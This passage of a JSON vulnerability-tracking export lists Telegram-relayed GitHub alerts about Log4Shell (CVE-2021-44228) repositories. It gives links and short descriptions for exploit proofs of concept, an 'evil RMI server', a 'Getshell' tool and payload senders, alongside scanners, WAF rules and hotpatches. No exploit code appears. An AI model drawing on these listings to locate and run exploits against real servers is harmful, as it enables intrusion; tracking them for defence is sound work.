"a0ad87e9-4683-42a4-bbda-326b2acb3e3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/967", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 Minecraft PoC\nURL\uff1ahttps://github.com/myyxl/cve-2021-44228-minecraft-poc", "creation_timestamp": "2021-12-12T11:24:08.000000Z"}, {"uuid": "41fbb748-de20-4c4b-b7e9-7959d61ebb96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/979", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228\nURL\uff1ahttps://github.com/Hydragyrum/evil-rmi-server", "creation_timestamp": "2021-12-12T16:51:03.000000Z"}, {"uuid": "651d491a-f7aa-40b8-978b-d94daa43a16d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/978", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aChecking for vulnerability CVE-2021-44228.\nURL\uff1ahttps://github.com/greymd/CVE-2021-44228", "creation_timestamp": "2021-12-12T16:13:39.000000Z"}, {"uuid": "e4ce9fb5-c722-4d92-806a-526d19004ebf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1007", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple tool for scanning entire directories for attempts of CVE-2021-44228\nURL\uff1ahttps://github.com/kek-Sec/log4j-scanner-CVE-2021-44228", "creation_timestamp": "2021-12-13T08:55:59.000000Z"}, {"uuid": "e6e4f3ce-8608-4a4e-9414-d343c76a8e3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1061", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228", "creation_timestamp": "2021-12-14T14:52:43.000000Z"}, {"uuid": "1b1c7669-30da-4c74-b5f1-a0435be944e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1060", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThe vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell.\nURL\uff1ahttps://github.com/ReynerGonzalez/Security-Log4J-Tester", "creation_timestamp": "2021-12-14T14:48:27.000000Z"}, {"uuid": "be0c90c9-a844-4345-a147-e0e0d67370b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1059", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aGitHub CodeQL Action to scan for CVE-2021\u201344228\nURL\uff1ahttps://github.com/benarculus/detecting-cve-2021-44228", "creation_timestamp": "2021-12-14T14:01:36.000000Z"}, {"uuid": "58e78291-607b-4161-91b8-2df96f5b389f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1058", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetails : CVE-2021-44228\nURL\uff1ahttps://github.com/34zY/JNDI-Exploit-1.2-log4shell-", "creation_timestamp": "2021-12-14T12:06:48.000000Z"}, {"uuid": "1e982e6a-1209-413e-9480-b4e7a2ab64be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1068", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aGenerate CVE-2021-44228 commands to test servers with ease!\nURL\uff1ahttps://github.com/csduncan9/Log4j-CVE-2021-44228-command-generator", "creation_timestamp": "2021-12-14T20:14:55.000000Z"}, {"uuid": "dabd7aca-eb0f-44c4-9f4d-ac6b27bf5088", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1067", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aRed Team\n\u63cf\u8ff0\uff1aSome files for red team/blue team investigations into CVE-2021-44228\nURL\uff1ahttps://github.com/jmarcbaker/Red-vs-Blue-Team-Project-II", "creation_timestamp": "2021-12-14T20:06:22.000000Z"}, {"uuid": "14508807-dca9-4ba8-9271-f41e0252a271", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/949", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetections for CVE-2021-44228 inside of nested binaries\nURL\uff1ahttps://github.com/darkarnium/CVE-2021-44228", "creation_timestamp": "2021-12-11T16:42:36.000000Z"}, {"uuid": "cdf3a947-ab62-49b1-b82d-bd6a91399e0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/948", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/zzzz0317/log4j2-vulnerable-spring-app", "creation_timestamp": "2021-12-11T16:25:57.000000Z"}, {"uuid": "b53dcf11-24d2-416d-b72e-80f5d1d10957", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/955", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device\nURL\uff1ahttps://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228", "creation_timestamp": "2021-12-11T22:05:23.000000Z"}, {"uuid": "5ba3a390-de4b-49e4-a8c7-4cd7927bb8d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/954", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device\nURL\uff1ahttps://github.com/irgoncalves/f5-waf-enforce-sigs-CVE-2021-44228", "creation_timestamp": "2021-12-11T22:01:16.000000Z"}, {"uuid": "915578b6-bff0-45bf-9581-f6137adc0769", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/953", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSpring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.\nURL\uff1ahttps://github.com/christophetd/log4shell-vulnerable-app", "creation_timestamp": "2021-12-11T21:15:41.000000Z"}, {"uuid": "9dc9ad73-65b8-4316-8285-74ebdb490039", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1128", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC RCE Log4j CVE-2021-4428 para pruebas\nURL\uff1ahttps://github.com/Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE", "creation_timestamp": "2021-12-17T06:39:43.000000Z"}, {"uuid": "8aa442c1-0255-46f4-bfe8-9d287805d76e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1135", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228)\nURL\uff1ahttps://github.com/scheibling/py-log4shellscanner", "creation_timestamp": "2021-12-17T10:07:31.000000Z"}, {"uuid": "fc35f632-b7e0-4e7e-bd7a-c2b257e6c80e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1154", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA tool to analyze the log files from minecraft to scan potential security risks from the CVE-2021-44228 Log4J library exploit. \nURL\uff1ahttps://github.com/psychose-club/Saturn", "creation_timestamp": "2021-12-18T10:16:38.000000Z"}, {"uuid": "aab61425-bc59-4b13-bc91-78b2e735899c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1153", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple Python 3 script to detect the \\\"Log4j\\\" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading\nURL\uff1ahttps://github.com/kal1gh0st/MyLog4Shell", "creation_timestamp": "2021-12-18T08:21:41.000000Z"}, {"uuid": "d4e30636-2845-40c3-937b-04c509b77131", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1151", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 Getshell\nURL\uff1ahttps://github.com/shakeman8/log4j_getshell", "creation_timestamp": "2021-12-18T06:43:36.000000Z"}, {"uuid": "b850092a-b38d-4473-9f92-d94c3b6a2267", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/956", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1adocker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228\nURL\uff1ahttps://github.com/jeffbryner/log4j-docker-vaccine", "creation_timestamp": "2021-12-11T23:11:16.000000Z"}, {"uuid": "e14e998f-55ab-4bc7-bd94-112ba302bb6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/974", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aMitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script\nURL\uff1ahttps://github.com/infiniroot/nginx-mitigate-log4shell", "creation_timestamp": "2021-12-12T13:47:18.000000Z"}, {"uuid": "e1006f4b-818b-4b17-a0fd-7d46e94e6e82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/973", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython script that sends CVE-2021-44228 log4j payload requests to url list\nURL\uff1ahttps://github.com/ssl/scan4log4j", "creation_timestamp": "2021-12-12T13:43:10.000000Z"}, {"uuid": "5630cd85-8cc0-4c07-830d-0281952bb071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/969", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoc of log4j2 (CVE-2021-44228)\nURL\uff1ahttps://github.com/Crane-Mocker/log4j-poc", "creation_timestamp": "2021-12-12T11:36:48.000000Z"}, {"uuid": "e1d26bad-ec42-4871-aadb-8f4bc2b0e14f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/983", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn  agent to hotpatch the log4j RCE from CVE-2021-44228.\nURL\uff1ahttps://github.com/corretto/hotpatch-for-apache-log4j2", "creation_timestamp": "2021-12-12T21:27:46.000000Z"}, {"uuid": "8ddfa95e-fca5-4703-b447-63bd113e9ef3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/982", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCheck list of URLs against Log4j vulnerability CVE-2021-44228\nURL\uff1ahttps://github.com/OlafHaalstra/log4jcheck", "creation_timestamp": "2021-12-12T18:59:16.000000Z"}, {"uuid": "d4308fd6-7f3e-42fe-8442-8c502a01ea58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/986", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j RCE - (CVE-2021-44228)\nURL\uff1ahttps://github.com/momos1337/Log4j-RCE", "creation_timestamp": "2021-12-12T22:42:29.000000Z"}, {"uuid": "6e071b6b-bbef-4849-82d2-050e63b177a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/985", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE)\nURL\uff1ahttps://github.com/corneacristian/Log4J-CVE-2021-44228-RCE", "creation_timestamp": "2021-12-12T21:56:35.000000Z"}, {"uuid": "11856767-6d3c-4909-ada1-9127c9370311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/984", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell CVE-2021-44228\nURL\uff1ahttps://github.com/cyberxml/log4j-poc", "creation_timestamp": "2021-12-12T21:48:14.000000Z"}, {"uuid": "2428f633-ef02-474c-a4e5-ea8dbe10846d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/995", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228).\nURL\uff1ahttps://github.com/pedrohavay/exploit-CVE-2021-44228", "creation_timestamp": "2021-12-13T02:20:42.000000Z"}, {"uuid": "bb7152b5-d2a7-49eb-91b3-d7441ab5ef87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/994", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4J burp\u88ab\u626b\u63d2\u4ef6\u3001CVE-2021-44228\u3001\u652f\u6301dnclog.cn\u548cburp\u5185\u7f6eDNS\u3001\u53ef\u914d\u5408JNDIExploit\u751f\u6210payload\nURL\uff1ahttps://github.com/bigsizeme/Log4j-check", "creation_timestamp": "2021-12-13T01:59:35.000000Z"}, {"uuid": "9c36bc24-5b09-4ec2-b087-e9fe338dd6fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/992", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1afail2ban filter that catches attacks againts log4j CVE-2021-44228\nURL\uff1ahttps://github.com/atnetws/fail2ban-log4j", "creation_timestamp": "2021-12-13T00:31:02.000000Z"}, {"uuid": "d71010ed-7338-4ec2-884e-6fdd8dee02aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/991", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.\nURL\uff1ahttps://github.com/KainsRache/anti-jndi", "creation_timestamp": "2021-12-13T00:26:46.000000Z"}, {"uuid": "c84a43b3-ac7d-4179-801e-b8a027d833b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/990", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSome files for red team/blue team investigations into CVE-2021-44228\nURL\uff1ahttps://github.com/kimobu/cve-2021-44228", "creation_timestamp": "2021-12-13T00:18:23.000000Z"}, {"uuid": "6e61f3bc-21ff-49fc-a5f3-527797e8941a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1121", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aApplications that are vulnerable to the log4j CVE-2021-44228/45046 issue may be detectable by scanning jar, war, ear, zip files to search for the presence of JndiLookup.class.\nURL\uff1ahttps://github.com/hozyx/log4shell", "creation_timestamp": "2021-12-16T19:04:08.000000Z"}, {"uuid": "2319bc7f-b8a0-441a-98d2-fdbeea177861", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1120", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScans for Log4j versions effected by CVE-2021-44228\nURL\uff1ahttps://github.com/mergebase/log4j-detector", "creation_timestamp": "2021-12-16T18:55:17.000000Z"}, {"uuid": "4afa7d41-2b00-4e7a-adfa-63096f2f9f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1127", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA lab demonstration of the log4shell vulnerability: CVE-2021-44228\nURL\uff1ahttps://github.com/obscuritylabs/log4shell-poc-lab", "creation_timestamp": "2021-12-17T04:26:05.000000Z"}, {"uuid": "ef984f01-64f4-4952-89bb-8fe57cf8f834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1125", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTest exploit of CVE-2021-44228\nURL\uff1ahttps://github.com/wajda/log4shell-test-exploit", "creation_timestamp": "2021-12-17T01:52:17.000000Z"}, {"uuid": "6faef6c8-57f4-4b3d-bd4b-53aaf2ec1bc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/966", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDeploys an agent to fix  CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process\nURL\uff1ahttps://github.com/simonis/Log4jPatch", "creation_timestamp": "2021-12-12T10:34:24.000000Z"}, {"uuid": "33543d00-42c3-4afe-8d9c-49fe948b9333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/964", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228(Apache Log4j Remote Code Execution\uff09\nURL\uff1ahttps://github.com/RK800-DEV/apache-log4j-exploit", "creation_timestamp": "2021-12-12T10:13:30.000000Z"}, {"uuid": "b860411a-684a-45ec-aba4-cfbb710bad23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1124", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j - Multitool. Find &amp; fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment\nURL\uff1ahttps://github.com/suuhm/log4shell4shell", "creation_timestamp": "2021-12-16T23:16:39.000000Z"}, {"uuid": "e9c6cb7d-2ebc-40b8-8fbe-85fbbf72249e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/963", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA bare minimum proof-of-concept of Log4j2 JNDI Remote-Code-Execution vulnerability (CVE-2021-44228).\nURL\uff1ahttps://github.com/unlimitedsola/log4j2-rce-poc", "creation_timestamp": "2021-12-12T09:44:04.000000Z"}, {"uuid": "1f49b605-4f7c-4796-b33f-259dc576773a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1066", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTools for investigating Log4j CVE-2021-44228\nURL\uff1ahttps://github.com/MalwareTech/Log4jTools", "creation_timestamp": "2021-12-14T19:11:30.000000Z"}, {"uuid": "a007de37-91ea-4ad3-a4d0-c36b7b2d9a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": 